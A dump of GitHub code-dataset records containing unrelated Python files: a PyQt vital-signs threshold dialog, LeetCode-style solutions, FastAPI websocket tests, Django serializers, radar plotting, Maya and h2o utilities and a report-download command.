self).__init__()\r\n\t\tself.setupUi(self)\r\n\t\tself.saveValues_btn.clicked.connect(self.changeAbnormalityValues)\r\n\r\n\t\tself.lowRespi = dh.getLowRespiValues()\r\n\t\tself.highRespi = dh.getHighRespiValues()\r\n\t\tself.lowHeart = dh.getLowHeartValues()\r\n\t\tself.highHeart = dh.getHighHeartValues()\r\n\r\n\t\tself.lowRespiMin_blank.setText(str(self.lowRespi[0]))\r\n\t\tself.lowRespiMax_blank.setText(str(self.lowRespi[1]))\r\n\t\tself.highRespiMin_blank.setText(str(self.highRespi[0]))\r\n\t\tself.highRespiMax_blank.setText(str(self.highRespi[1]))\r\n\t\tself.lowHeartMin_blank.setText(str(self.lowHeart[0]))\r\n\t\tself.lowHeartMax_blank.setText(str(self.lowHeart[1]))\r\n\t\tself.highHeartMin_blank.setText(str(self.highHeart[0]))\r\n\t\tself.highHeartMax_blank.setText(str(self.highHeart[1]))\r\n\r\n\r\n\r\n\tdef changeAbnormalityValues(self):\r\n\t\ttry:\r\n\t\t\tself.rLow_min = int(self.lowRespiMin_blank.text())\r\n\t\t\tself.rLow_max = int(self.lowRespiMax_blank.text())\r\n\t\t\tself.rHigh_min = int(self.highRespiMin_blank.text())\r\n\t\t\tself.rHigh_max = int(self.highRespiMax_blank.text())\r\n\t\t\tself.hLow_min = int(self.lowHeartMin_blank.text())\r\n\t\t\tself.hLow_max = int(self.lowHeartMax_blank.text())\r\n\t\t\tself.hHigh_min = int(self.highHeartMin_blank.text())\r\n\t\t\tself.hHigh_max = int(self.highHeartMax_blank.text())\r\n\r\n\r\n\r\n\t\t\tdh.updateRangeForRespi(self.rLow_min,self.rLow_max,self.rHigh_min,self.rHigh_max)\r\n\t\t\tdh.updateRangeForHeart(self.hLow_min,self.hLow_max,self.hHigh_min,self.hHigh_max)\r\n\r\n\t\t\tmsg = QMessageBox()\r\n\t\t\tmsg.setWindowTitle(\"SUCCESS\")\r\n\t\t\tmsg.setText(\"Values are now updated!\")\r\n\t\t\tmsg.setIcon(QMessageBox.Information)\r\n\t\t\tx = msg.exec_()\r\n\t\texcept:\r\n\t\t\tmsg = QMessageBox()\r\n\t\t\tmsg.setWindowTitle(\"Error!\")\r\n\t\t\tmsg.setText(\"Input is invalid!\")\r\n\t\t\tmsg.setIcon(QMessageBox.Critical)\r\n\t\t\tx = msg.exec_()\r\n\r\n\t\r\n \r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n form = Main()\r\n form.show()\r\n sys.exit(app.exec_())","repo_name":"jm18reyes/Respiratory-and-Heart-Rate-Analyzer","sub_path":"BLL/editValuePage.py","file_name":"editValuePage.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28144250267","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nWrite a program that outputs the string representation of numbers from 1 to n.\n\nBut for multiples of three it should output 
“Fizz” instead of the number and for the multiples of five output “Buzz”. For numbers which are multiples of both three and five output “FizzBuzz”.\n\nExample:\n\nn = 15,\n\nReturn:\n[\n \"1\",\n \"2\",\n \"Fizz\",\n \"4\",\n \"Buzz\",\n \"Fizz\",\n \"7\",\n \"8\",\n \"Fizz\",\n \"Buzz\",\n \"11\",\n \"Fizz\",\n \"13\",\n \"14\",\n \"FizzBuzz\"\n]\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def fizzBuzz(self, n: int) -> List[str]:\n result = list()\n for i in range(1, n + 1):\n if not i % (3 * 5):\n result.append(\"FizzBuzz\")\n elif not i % 3:\n result.append(\"Fizz\")\n elif not i % 5:\n result.append(\"Buzz\")\n else:\n result.append(str(i))\n\n return result\n\n\nif __name__ == '__main__':\n a = Solution()\n print(a.fizzBuzz(15))\n","repo_name":"heianhu/DataStructuresAndAlgorithm","sub_path":"算法/Leetcode/Easy/8.Math/1.Fizz Buzz.py","file_name":"1.Fizz Buzz.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"8267439583","text":"import sys\ninput = sys.stdin.readline\n\n\ndef getGraph():\n n = int(input())\n A = [None for _ in range(n+1)]\n A[0] = [-1 for _ in range (n+1)]\n for i in range(1,n+1):\n A[i] = [-1] + list(map(int,input().split()))\n return n,A\n\n\ndef isConnected(n,A):\n queue = [0]\n not_visited = set([i for i in range(n)])\n while bool(queue):\n v = queue.pop()\n not_visited.discard(v)\n for i in range(n):\n if A[v][i]:\n if i in not_visited:\n queue.append(i)\n return not bool(not_visited)\n\n\ndef findPath(a,b,n,A): # BFS\n queue = [a]\n visited = set([])\n I = [-1 for _ in range(n+1)]\n while bool(queue):\n v = queue.pop(0)\n visited.add(v)\n for i in range(1,n+1):\n if A[v][i] and i not in visited:\n I[i] = v\n if i == b: # arrived\n R = [b]\n prev = b\n while True:\n prev = I[prev]\n R.append(prev)\n if prev == a:\n return list(R.__reversed__())\n queue.append(i)\n\n return None\n\n\ndef main():\n n,A = getGraph() # n is |V|, A is adjacency graph\n for i in range(n): # even degree check\n if sum(A[i]) & 1:\n return False\n cycle = [0]\n while True:\n start = cycle[-1]\n for i in range(n):\n if A[start][i]:\n pass\n\nn,A = getGraph()\nprint(A)\nprint(findPath(1,4,n,A))","repo_name":"3-24/problem-solving","sub_path":"baekjoon/11403.py","file_name":"11403.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40505489036","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 11 16:00:44 2020\n\n@author: noahbrauer\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 18:37:21 2020\n\n@author: noahbrauer\n\"\"\"\n\nimport netCDF4\nimport gzip\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport conda\n\nconda_file_dir = conda.__file__\nconda_dir = conda_file_dir.split('lib')[0]\nproj_lib = os.path.join(os.path.join(conda_dir, 'share'), 'proj')\nos.environ[\"PROJ_LIB\"] = proj_lib\n\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.basemap import shiftgrid\nimport pyart\nimport seaborn as sns\n\n\nwith gzip.open('GRtoDPR.KTLX.150617.7390.V06A.KU.NS.1_21.nc.gz') as gz:\n with netCDF4.Dataset('file', mode = 'r', memory=gz.read()) as nc:\n print(nc.variables)\n latitude = nc.variables['latitude'][:].T\n longitude = nc.variables['longitude'][:].T\n z = nc.variables['ZFactorCorrected'][:]\n #zdr = nc.variables['']\n elev_angle = 
nc.variables['timeSweepStart'][:]\n\n\n\nelev_angle = 0\nz_lowest = z[elev_angle,:]\n#z_lowest[z_lowest<=0] = np.nan\n\n\n\n\n\n#%%\n\n#from matplotlib.colors import ListedColormap\n\ncolormap = ['white','dodgerblue', 'deepskyblue', 'lawngreen', 'lightgreen', 'green', 'gold', 'darkorange', 'red', 'firebrick']\n\nz_color = np.empty(667,dtype = 'str')\nz_color = []\n\n#for i in range(len(z_color)):\nfor i in range(len(z_lowest)):\n\n if z_lowest[i]<=5:\n #z_color[i] = colormap[0]\n z_color.append(colormap[0])\n \n elif z_lowest[i]>5 and z_lowest[i]<=10:\n #z_color[i] = colormap[1]\n z_color.append(colormap[1])\n \n elif z_lowest[i]>10 and z_lowest[i]<=15:\n #z_color[i] = colormap[2]\n z_color.append(colormap[2])\n \n elif z_lowest[i]>15 and z_lowest[i]<=20:\n #z_color[i] = colormap[3]\n z_color.append(colormap[3])\n \n elif z_lowest[i]>20 and z_lowest[i]<=25:\n #z_color[i] = colormap[4]\n z_color.append(colormap[4])\n \n elif z_lowest[i]>25 and z_lowest[i]<=30:\n #z_color[i] = colormap[5]\n z_color.append(colormap[5])\n \n elif z_lowest[i]>30 and z_lowest[i]<=35:\n #z_color[i] = colormap[6]\n z_color.append(colormap[6])\n \n elif z_lowest[i]>35 and z_lowest[i]<=40:\n #z_color[i] = colormap[7]\n z_color.append(colormap[7])\n \n elif z_lowest[i]>40 and z_lowest[i]<=45:\n #z_color[i] = colormap[8]\n z_color.append(colormap[8])\n \n elif z_lowest[i] == -100:\n #z_color[i] = colormap[0]\n z_color.append(colormap[0])\n \n \nfrom matplotlib.colors import ListedColormap\ncmap_z = ListedColormap(colormap) \n \n\n\n\n#%%\nimport matplotlib\n\nelev_angle = 0\n#Setup plotting \ncmin = 0; cmax = 50; cint = 5; clevs = np.round(np.arange(cmin,cmax,cint),2)\nnlevs = len(clevs) - 1; cmap = plt.get_cmap(name=cmap_z,lut=nlevs)\n\ncolour_norm_object = matplotlib.colors.Normalize(vmin=cmin, vmax=cmax, clip=False)\nscalar_mappable_object = plt.cm.ScalarMappable(cmap=cmap, norm=colour_norm_object)\nscalar_mappable_object.set_array(z_color)\n\nfigure_object, axes_object = plt.subplots(1, 1, figsize=(10, 10))\n\nc = plt.scatter(longitude[:, elev_angle], latitude[:, elev_angle], c = z_color, vmin = 0, vmax = 50, cmap = cmap, edgecolors = 'none')\n\n\nfor i in range(len(z_color)):\n if z_color[i] ==0: \n c2 = plt.scatter(longitude[i,elev_angle], latitude[i,elev_angle], edgecolors = 'k', facecolors = 'none')\n \n \nplt.xlabel('Longitude', size = 24)\nplt.ylabel('Latitude', size = 24)\nplt.title(r'KTLX $0.5^{o}$ $Z_{H}$ 6/17 0739 UTC ',name='Calibri',size=26)\n\ncolour_bar_object = plt.colorbar(ax=axes_object, mappable=scalar_mappable_object, orientation='vertical')\n\ncolour_bar_object.set_label('dBZ', size = 24)\n\nplt.show()\nplt.close(figure_object)\n\n\n","repo_name":"nbrauer93/TS_Bill","sub_path":"VN_KTLX.py","file_name":"VN_KTLX.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"10865753629","text":"import pytest\nfrom fastapi import FastAPI\nfrom fastapi.testclient import TestClient\n\nfrom socketsundso import WebSocketHandlingEndpoint, event\nfrom socketsundso.handler import Handler\n\napp = FastAPI()\n\n\n@app.websocket(\"/\")\nclass WSApp(WebSocketHandlingEndpoint):\n @event\n def decorator_without_parantheses(self):\n return {\"type\": \"hello_world\"}\n\n @event()\n async def decorator_with_parantheses(self):\n return {\"type\": \"hello_world\"}\n\n @event(\"decorator_with_parentheses_event\")\n async def decorator_with_parantheses_and_event(self):\n return {\"type\": \"hello_world\"}\n\n @event\n 
@staticmethod\n async def static_async_method():\n return {\"type\": \"hello_world\"}\n\n @event\n @staticmethod\n def static_method():\n return {\"type\": \"hello_world\"}\n\n @event\n async def async_with_arg(self, msg: str):\n return {\"reply\": msg}\n\n @event\n def with_arg(self, msg: str):\n return {\"reply\": msg}\n\n\n@WSApp.event\nasync def class_decorator_without_parantheses():\n return {\"type\": \"hello_world\"}\n\n\n@WSApp.event()\nasync def class_decorator_with_parantheses():\n return {\"type\": \"hello_world\"}\n\n\n@WSApp.event(\"class_decorator_with_parentheses_event\")\nasync def class_decorator_with_parantheses_and_event():\n return {\"type\": \"hello_world\"}\n\n\n@event\nasync def decorator_outside_class():\n return {\"type\": \"hello_world\"}\n\n\n@event\nasync def decorator_outside_class_attached():\n return {\"type\": \"hello_world\"}\n\n\nasync def function_without_decorator():\n return {\"type\": \"hello_world\"}\n\n\nWSApp.attach_handler(decorator_outside_class_attached)\nWSApp.attach_handler(Handler(method=function_without_decorator))\nWSApp.attach_handler(\n Handler(event=\"function_without_decorator_event\", method=function_without_decorator)\n)\n\nclient = TestClient(app)\n\n\n@pytest.mark.parametrize(\n \"event,expected_response\",\n [\n (\"decorator_without_parantheses\", {\"type\": \"hello_world\"}),\n (\"decorator_with_parantheses\", {\"type\": \"hello_world\"}),\n (\"decorator_with_parentheses_event\", {\"type\": \"hello_world\"}),\n (\"class_decorator_without_parantheses\", {\"type\": \"hello_world\"}),\n (\"class_decorator_with_parantheses\", {\"type\": \"hello_world\"}),\n (\"class_decorator_with_parentheses_event\", {\"type\": \"hello_world\"}),\n (\"function_without_decorator\", {\"type\": \"hello_world\"}),\n (\"function_without_decorator_event\", {\"type\": \"hello_world\"}),\n (\"decorator_outside_class_attached\", {\"type\": \"hello_world\"}),\n (\"static_method\", {\"type\": \"hello_world\"}),\n ],\n)\ndef test_events(event, expected_response):\n with client.websocket_connect(\"/\") as websocket:\n websocket.send_json({\"type\": event})\n data = websocket.receive_json()\n assert data == expected_response\n\n\n@pytest.mark.parametrize(\n \"event\",\n [\n (\"decorator_with_parantheses_and_event\"),\n (\"class_decorator_with_parantheses_and_event\"),\n (\"nonexistant\"),\n (\"decorator_outside_class\"),\n ],\n)\ndef test_nonexistant_events(event):\n with client.websocket_connect(\"/\") as websocket:\n websocket.send_json({\"type\": event})\n data = websocket.receive_json()\n assert \"errors\" in data\n assert data[\"errors\"][0][\"ctx\"][\"given\"] == event\n\n\n@pytest.mark.parametrize(\n \"event,args,expected_response\",\n [\n (\n \"async_with_arg\",\n {\"msg\": \"foobar\"},\n {\"type\": \"async_with_arg\", \"reply\": \"foobar\"},\n ),\n (\"with_arg\", {\"msg\": \"foobar\"}, {\"type\": \"with_arg\", \"reply\": \"foobar\"}),\n ],\n)\ndef test_with_param(event, args, expected_response):\n with client.websocket_connect(\"/\") as websocket:\n websocket.send_json({\"type\": event, **args})\n data = websocket.receive_json()\n assert data == expected_response\n","repo_name":"dingensundso/socketsundso","sub_path":"tests/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"71449844675","text":"from itertools import product\n# from typing_extensions import Required\nfrom unittest.util import 
_MAX_LENGTH\nfrom rest_framework.exceptions import ValidationError\nfrom django.http import request\nfrom rest_framework import serializers\nfrom .models import Category, Tag, Review, Product\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Category\n        fields = ['name']\n\n\nclass TagSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Tag\n        fields = ['name']\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Review\n        fields = ['text']\n\n\nclass ProductListSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Product\n        fields = ['id', 'title']\n\n\nclass ProductDetailSerializer(serializers.ModelSerializer):\n    category = CategorySerializer()\n    tags = TagSerializer(many=True)\n    reviews = ReviewSerializer(many=True)\n\n    class Meta:\n        model = Product\n        fields = ['title', 'description', 'price', 'category', 'tags', 'reviews']\n\n\nclass ProductReviewSerializer(serializers.ModelSerializer):\n    reviews = ReviewSerializer(many=True)\n\n    class Meta:\n        model = Product\n        fields = ['id', 'title', 'reviews']\n\n\nclass ProductTagsSerializer(serializers.ModelSerializer):\n    tags = serializers.SerializerMethodField()\n\n    class Meta:\n        model = Product\n        fields = 'id title tags'.split()\n\n    def get_tags(self, product):\n        active_tags = product.tags.filter(is_active=True)\n        data = TagSerializer(active_tags, many=True).data\n        return data\n\n\nclass ProductCreateSerializer(serializers.ModelSerializer):\n    title = serializers.CharField(max_length=23)\n    description = serializers.CharField(required=False)\n    price = serializers.FloatField()\n    category = serializers.IntegerField()\n    tags = serializers.ListField()\n\n\n    def validate(self, attrs):\n        title = attrs['title']\n        products = Product.objects.filter(title=title)\n        if products:\n            raise ValidationError('Product already exists!')\n        return attrs\n","repo_name":"BeksBratan/DjangoShop","sub_path":"shop/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4234050829","text":"# Implement a MyQueue class which implements a queue using two stacks\n\n\nclass MinStack:\n    def __init__(self):\n        from array import array\n        self.stack = array('d')\n        self.pointer = -1\n        self.mindex = []\n        self.minptr = -1\n\n    def pop(self):\n        if self.pointer != -1:\n            if self.pointer == self.mindex[self.minptr]:\n                self.mindex.pop()\n                self.minptr -= 1\n            res = self.stack[self.pointer]\n            self.stack.pop()\n            self.pointer -= 1\n            return res\n\n    def push(self, item):\n        self.stack.append(item)\n        self.pointer += 1\n        if self.minptr != -1:\n            if item < self.stack[self.mindex[self.minptr]]:\n                self.mindex.append(self.pointer)\n                self.minptr += 1\n        else:\n            self.mindex.append(self.pointer)\n            self.minptr += 1\n\n    def min(self):\n        if self.minptr != -1:\n            return self.stack[self.mindex[self.minptr]]\n\n    def peek(self):\n        if self.pointer != -1:\n            return self.stack[self.pointer]\n\n\nclass MyQueue:\n\n    def __init__(self):\n        self.old_stack = MinStack()\n        self.new_stack = MinStack()\n\n    def push(self, item):\n        self.new_stack.push(item)\n\n    def pop(self):\n        # Only refill old_stack when it is empty; draining new_stack eagerly would break FIFO order.\n        if self.old_stack.pointer == -1:\n            while self.new_stack.pointer != -1:\n                self.old_stack.push(self.new_stack.pop())\n        return self.old_stack.pop()\n\n    def peek(self):\n        if self.old_stack.pointer == -1:\n            while self.new_stack.pointer != -1:\n                self.old_stack.push(self.new_stack.pop())\n        return self.old_stack.peek()\n\n\nif __name__ == \"__main__\":\n    print(\"QueueStack\")\n    l = MyQueue()\n    for i in range(0,10000,100):\n        l.push(i)\n    
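# Drain the queue: items must come back in FIFO order (0, 100, 200, ...).\n    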
for i in range(0,10000,100):\n print(l.pop())","repo_name":"Monata/CTCI_Python3_Solutions","sub_path":"CTCI_solutions/3.4_QueueStack.py","file_name":"3.4_QueueStack.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31760021967","text":"import wx\n\n\ndef create_menu_item(menu, label, func):\n item = wx.MenuItem(menu, -1, label)\n menu.Bind(wx.EVT_MENU, func, id=item.GetId())\n menu.AppendItem(item)\n return item\n\n\nclass PromptingComboBox(wx.ComboBox):\n def __init__(self, *args, **kwargs):\n wx.ComboBox.__init__(self, *args, **kwargs)\n self.choices = []\n self.Bind(wx.EVT_TEXT, self.EvtText)\n self.Bind(wx.EVT_CHAR, self.EvtChar)\n self.Bind(wx.EVT_COMBOBOX, self.EvtCombobox)\n self.ignore_evt_text = False\n\n def EvtCombobox(self, event):\n self.ignore_evt_text = True\n event.Skip()\n\n def EvtChar(self, event):\n if event.GetKeyCode() == 8 or event.GetKeyCode() == 127:\n self.ignore_evt_text = True\n event.Skip()\n\n def EvtText(self, event):\n if self.ignore_evt_text:\n self.ignore_evt_text = False\n return\n currentText = event.GetString()\n found = False\n for choice in self.choices :\n if choice.startswith(currentText):\n self.ignore_evt_text = True\n self.SetValue(choice)\n self.SetInsertionPoint(len(currentText))\n self.SetMark(len(currentText), len(choice))\n found = True\n break\n if not found:\n event.Skip()","repo_name":"neowinx/chow-chow","sub_path":"gui/extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74357261314","text":"import os\nimport sys\nimport ntpath\nimport pandas as pd\nimport datavisualizer.models.custom_table_instance as cti\n\n\nclass ProjectInstance:\n def __init__(self, input_path, type_of_file):\n self.input_path = input_path\n self.type_of_file = type_of_file\n self.list_of_custom_table_instances = []\n self.path_to_icon = None\n self.path_to_csv_icon = os.path.join(os.getcwd(), 'datavisualizer', 'resources', 'images', 'icon.csv.60x60.png')\n self.path_to_excel_icon = os.path.join(os.getcwd(), 'datavisualizer', 'resources', 'images', 'icon.excel.60x60.png')\n self.plain_text_csv = 'csv'\n self.plain_text_excel = 'excel'\n self.file_name = self._set_file_name()\n self.init()\n\n def init(self):\n if self.type_of_file is self.plain_text_excel:\n self.path_to_icon = self.path_to_excel_icon\n self._set_list_of_df_out_of_excel()\n if self.type_of_file is self.plain_text_csv:\n self.path_to_icon = self.path_to_csv_icon\n self._set_list_of_df_out_of_csv()\n\n def _set_file_name(self):\n head, tail = ntpath.split(self.input_path)\n return tail or ntpath.basename(head)\n\n def _filter_extension_out_of_csv_file_name(self):\n return os.path.splitext(self.file_name)[0]\n\n def _set_list_of_df_out_of_excel(self):\n xl_file = pd.ExcelFile(self.input_path)\n for v in xl_file.sheet_names:\n df = xl_file.parse(v, header=None)\n if not df.empty:\n custom_table_instance = cti.CustomTableInstance(\n df.fillna(0), v, self.file_name)\n self.list_of_custom_table_instances.append(\n custom_table_instance)\n\n def _set_list_of_df_out_of_csv(self):\n df = pd.read_csv(self.input_path, header=None)\n if not df.empty:\n custom_table_instance = cti.CustomTableInstance(\n df.fillna(0),\n self._filter_extension_out_of_csv_file_name(),\n self.file_name)\n 
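# Collect the parsed table; its display name is the CSV file name without the extension.\n            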
self.list_of_custom_table_instances.append(custom_table_instance)\n","repo_name":"alexLX7/DataVisualizer","sub_path":"datavisualizer/models/project_instance.py","file_name":"project_instance.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11536007406","text":"import json\nimport re\nimport urllib.request\n\nimport requests\nfrom django.contrib.auth.models import User\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError\n\nfrom accounts.models import Provider, TERR_LOCAL, TERR_COUNTRY, LegalForm, Consumer\nfrom mes import settings\n\n\nclass Command(BaseCommand):\n help = 'Fetch current status of every user in the system from the external source'\n\n\n\n def handle(self, *args, **options):\n\n for entity in Provider.objects.all().prefetch_related('social_balances'):\n balance = entity.social_balances.all().first()\n if balance and balance.done:\n print(balance.external_id)\n\n report = 'https://madrid.mercadosocial.net/balance/balances_2018/{}.pdf'.format(balance.external_id)\n image = 'https://madrid.mercadosocial.net/balance/img/entidades/{}.jpg'.format(balance.external_id)\n\n try:\n reportFile = urllib.request.urlopen(report)\n with open('{}.pdf'.format(balance.external_id), 'wb') as output:\n output.write(reportFile.read())\n except Exception as e:\n print(e)\n\n try:\n imageFile = urllib.request.urlopen(image)\n with open('{}.jpg'.format(balance.external_id), 'wb') as output:\n output.write(imageFile.read())\n except Exception as e:\n print(e)","repo_name":"Mercado-Social-de-Madrid/gestionMES","sub_path":"accounts/management/commands/download_reports.py","file_name":"download_reports.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"12105329839","text":"#! usr/bin/python3\n# regexStrip.py works like the strip() method by using Regexs\n\n#use match object.start and .end to take substrings of paramStr\n\nimport re\n\ndef regStrip(paramStr, paramReg = r'\\s*'):\n\n frontReg = re.compile('^(' + paramReg + ')*')\n backReg = re.compile('(' + paramReg + ')*$')\n\n frontMo = frontReg.search(paramStr)\n backMo = backReg.search(paramStr)\n\n start = 0\n end = len(paramStr)\n \n if frontMo != None:\n start = frontMo.end()\n \n if backMo != None:\n end = backMo.start()\n \n print('Stripping...')\n newStr = paramStr[start:end]\n print(newStr)\n return newStr\n\nwhile True:\n print('\\nType the original string first, or EXIT to terminate')\n text = input()\n if text == 'EXIT':\n print('Terminating...')\n break\n\n print('''Type the substring that needs to be stripped\nOr [ENTER] to strip whitespace''')\n \n strip = input()\n if strip == '':\n regStrip(text)\n else:\n regStrip(text, strip)\n","repo_name":"ranvit/PythonPractice","sub_path":"regexStrip.py","file_name":"regexStrip.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21576340885","text":"# -*- coding: utf-8 -*-\nu\"\"\"Joint utils @ utils\n\"\"\"\n\nimport maya.cmds as mc\n\n\ndef listHierarchy(topJoint, withEndJoints=True):\n u\"\"\"List joint hierarchy starting with top joint.\n\n Args:\n topJoint (str): Joint to get listed with its joint hierarchy.\n withEndJoints (bool, optional): List hierarchy including end joints. 
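The regexStrip record above wraps the caller's pattern as '(...)*', which with the default r'\s*' produces the nested quantifier (\s*)*. A compact re.sub-based sketch (hypothetical reg_strip, default tightened to r'\s+') that strips repeats from both ends without that construction:

import re

def reg_strip(text, pattern=r'\s+'):
    text = re.sub(rf'^(?:{pattern})+', '', text)
    return re.sub(rf'(?:{pattern})+$', '', text)

# reg_strip('xxhelloxx', 'x') -> 'hello'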
Defaults to True.\n\n Returns:\n list: Listed joints starting with top joint.\n \"\"\"\n\n listedJoints = mc.listRelatives(topJoint, type=\"joint\", ad=True)\n listedJoints.append(topJoint)\n listedJoints.reverse()\n\n completeJoints = listedJoints[:]\n\n if not withEndJoints:\n completeJoints = [j for j in listedJoints if mc.listRelatives(j, c=1, type=\"joint\")]\n\n return completeJoints","repo_name":"leonardpin-br/procedural_rigging","sub_path":"code/python/src/rigLib/utils/joint.py","file_name":"joint.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13349234194","text":"import os\nimport sys\n\nsys.path.insert(1, os.path.join(\"..\",\"..\",\"..\"))\nimport h2o\nfrom h2o.estimators.infogram import H2OInfogram\nfrom tests import pyunit_utils\n \ndef test_infogram_german_data():\n \"\"\"\n Simple german data test to check that safe infogram is working:\n 1. it generates the correct lists as Deep's original code. \n 2. when model and infogram parameters are specified, it uses the correct specification.\n :return: \n \"\"\"\n deep_rel = [1.00000000, 0.58302027, 0.43431236, 0.66177924, 0.53677082, 0.25084764, 0.34379833, 0.13251726, \n 0.11473028, 0.09548423, 0.20398740, 0.16432640, 0.06875276, 0.04870468, 0.12573930, 0.01382682, \n 0.04496173, 0.01273963]\n deep_cmi = [0.84946975, 0.73020930, 0.58553936, 0.75780528, 1.00000000, 0.38461582, 0.57575695, 0.30663930, \n 0.07604779, 0.19979514, 0.42293369, 0.20628365, 0.25316918, 0.15096705, 0.24501686, 0.11296778, \n 0.13068605, 0.03841617]\n fr = h2o.import_file(path=pyunit_utils.locate(\"smalldata/admissibleml_test/german_credit.csv\"))\n target = \"BAD\"\n fr[target] = fr[target].asfactor()\n x = fr.names\n x.remove(target)\n x.remove(\"status_gender\")\n x.remove( \"age\")\n infogram_model = H2OInfogram(seed = 12345, protected_columns=[\"status_gender\", \"age\"], top_n_features=50)\n infogram_model.train(x=x, y=target, training_frame=fr)\n\n # make sure our result matches Deep's\n pred_names, rel = infogram_model.get_all_predictor_relevance()\n x, cmi = infogram_model.get_all_predictor_cmi()\n assert deep_rel.sort() == rel.sort(), \"Expected: {0}, actual: {1}\".format(deep_rel, rel)\n assert deep_cmi.sort() == cmi.sort(), \"Expected: {0}, actual: {1}\".format(deep_cmi, cmi)\n\n gbm_params = {'ntrees':3}\n infogram_model_gbm_glm = H2OInfogram(seed = 12345, protected_columns=[\"status_gender\", \"age\"], top_n_features=50, \n algorithm='gbm', algorithm_params=gbm_params)\n infogram_model_gbm_glm.train(x=x, y=target, training_frame=fr)\n x, cmi_gbm_glm = infogram_model_gbm_glm.get_all_predictor_cmi()\n assert abs(cmi_gbm_glm[1]-cmi[1]) > 0.01, \"CMI from infogram model with gbm using different number of trees should\" \\\n \" be different but are not.\"\n \ndef assert_list_frame_equal(cmi, rel, predictor_rel_cmi_frame, tol=1e-6):\n rel_frame = predictor_rel_cmi_frame[3].as_data_frame(use_pandas=False)\n cmi_frame = predictor_rel_cmi_frame[4].as_data_frame(use_pandas=False)\n count = 1\n for one_cmi in cmi:\n assert abs(float(cmi_frame[count][0])-one_cmi) < tol, \"expected: {0}, actual: {1} and they are \" \\\n \"different\".format(float(cmi_frame[count][0]), one_cmi) \n assert abs(float(rel_frame[count][0])-rel[count-1]) < tol, \"expected: {0}, actual: {1} and they are \" \\\n \"different\".format(float(rel_frame[count][0]), rel[count-1])\n count += 1\n\n\nif __name__ == \"__main__\":\n 
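One caveat for the listHierarchy record above: maya.cmds.listRelatives returns None when a joint has no descendants, so the append/reverse calls would raise for a lone joint. A defensive variant sketch under the same API:

import maya.cmds as mc

def list_hierarchy(top_joint, with_end_joints=True):
    joints = mc.listRelatives(top_joint, type="joint", ad=True) or []
    joints.append(top_joint)
    joints.reverse()
    if not with_end_joints:
        # keep only joints that still have joint children
        joints = [j for j in joints if mc.listRelatives(j, c=1, type="joint")]
    return joints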
pyunit_utils.standalone_test(test_infogram_german_data)\nelse:\n test_infogram_german_data()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/infogram/pyunit_PUBDEV_8075_safe_infogram_german_data_infogram_params.py","file_name":"pyunit_PUBDEV_8075_safe_infogram_german_data_infogram_params.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"6183469688","text":"class Solution:\n def threeSum(self, nums):\n length=len(nums)\n ls=[]\n same=[]\n for i in range(length):\n for j in range(i+1,length):\n if 0-nums[i]-nums[j] in nums[j+1:]:\n lst=[nums[i],nums[j],0-nums[i]-nums[j]]\n if set(lst)not in same:\n ls.append(lst)\n same.append(set(lst))\n print(ls)\n \np1=Solution()\nprint(p1.threeSum([-1,0,1,2,-1,-4]))\n","repo_name":"Sheldoer/leetcode_python","sub_path":"015三数之和.py","file_name":"015三数之和.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43267675123","text":"class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass treeToDoublyList:\n def treeToDoublyList(self, root: 'Node') -> 'Node':\n # Time:O(n) number of nodes\n # Space: O(n) best case logn which is height of tree. n is worst case. tree is a list\n # inorder traversal 在BST 的本质就是 以从小到大的顺序浏览整个的tree。 